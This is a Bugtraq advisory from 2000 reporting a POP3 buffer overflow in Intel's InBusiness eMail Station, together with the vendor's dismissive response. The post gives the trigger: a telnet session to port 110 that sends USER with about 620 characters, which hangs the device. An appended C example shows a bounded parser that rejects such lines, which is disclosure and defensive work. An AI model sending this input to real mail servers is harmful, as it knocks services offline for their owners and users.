[17282] in bugtraq
DoS in Intel corporation 'InBusiness eMail Station'
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Knud_Erik_H=F8jgaar)
Fri Oct 20 12:56:23 2000
Message-Id: <MMEEJPEPBPAOHOAFGCKPCEGBCDAA.knud@cybercity.dk>
Date: Fri, 20 Oct 2000 14:05:52 +0200
Reply-To: Knud Erik Højgaard - CyberCity Support <knud@CYBERCITY.DK>
From: Knud Erik Højgaard - CyberCity Support <knud@CYBERCITY.DK>
To: BUGTRAQ@SECURITYFOCUS.COM
Intel corporation 'InBusiness eMail Station' firmware version 1.04.87
(latest) Denial of service vulnerability.
Vendor notification date: 20/10-2000
Public notification date: 20/10-2000
Problem: I found a buffer overflow in the Intel InBusiness eMail Station,
which can enable an attacker to execute a denial of service attack against it.
Disclaimer: For educational purposes only.
Example:
[foo@bar]$ telnet mailstation 110
Trying mailstation...
Connected to mailstation.
Escape character is '^]'.
+OK Pop server at mailstation starting. <2831812.972049732@mail>
user [buffer]
where [buffer] is approx. 620 chars of your own choice. (Tried A and %, expect
all to work.)
Symptoms: The box (a nice little piece of hardware with built-in hard drive
and all) will stop responding, and needs a power cycle to restore function.
Reason for posting same date as vendor notification: Intel was contacted
and informed of the bug, and all they had to say was "You're using it in a
way it's not supposed to be used" (I told them it was on a leased line) - in
their opinion it doesn't matter since it's possible to connect a modem to it,
and use it for retrieving mail and distributing it locally.
Sincerely (and a big thanks to Intel for not caring about product security
at all)
Knud Erik Højgaard <kain@perker.dk>
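
A bounded POP3 command parser that refuses an overlong USER argument like the one in the post above instead of copying it. This is an added example, not part of the original message and not Intel's firmware code; the function names, the sample input and the 255-octet line limit (RFC 2449) are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed limit: RFC 2449 caps a POP3 command line at 255 octets incl. CRLF. */
#define POP3_MAX_LINE 255
enum pop3_status { POP3_OK, POP3_ERR_TOO_LONG, POP3_ERR_SYNTAX };
struct pop3_cmd {
    char keyword[5];              /* 3-4 letter keyword + NUL */
    char arg[POP3_MAX_LINE];      /* fits the argument of any accepted line */
};
static struct pop3_cmd last_cmd;  /* result of the most recent try_user_arg() */

/* Parse one received line of len bytes (not NUL-terminated). The length is
   checked before anything is copied, so overlong input is refused outright. */
enum pop3_status pop3_parse(const char *line, size_t len, struct pop3_cmd *out)
{
    if (len > POP3_MAX_LINE)
        return POP3_ERR_TOO_LONG;
    if (len < 2 || line[len - 2] != '\r' || line[len - 1] != '\n')
        return POP3_ERR_SYNTAX;
    len -= 2;                                     /* drop the CRLF */
    const char *sp = memchr(line, ' ', len);
    size_t klen = sp ? (size_t)(sp - line) : len;
    if (klen < 3 || klen > 4)                     /* keyword is 3 or 4 chars */
        return POP3_ERR_SYNTAX;
    memcpy(out->keyword, line, klen);
    out->keyword[klen] = '\0';
    size_t alen = sp ? len - klen - 1 : 0;        /* at most 249 < sizeof arg */
    if (alen)
        memcpy(out->arg, sp + 1, alen);
    out->arg[alen] = '\0';
    return POP3_OK;
}

/* Constructed input: "USER " followed by n filler bytes and CRLF. */
enum pop3_status try_user_arg(size_t n)
{
    char line[1024] = "USER ";
    if (n > sizeof line - 8)
        return POP3_ERR_TOO_LONG;
    memset(line + 5, 'A', n);
    memcpy(line + 5 + n, "\r\n", 2);
    return pop3_parse(line, 5 + n + 2, &last_cmd);
}

int main(void)
{
    printf("5 bytes: %d, 620 bytes: %d\n", try_user_arg(5), try_user_arg(620));
    return 0;
}
```

A server built this way would answer the rejected line with -ERR and keep running.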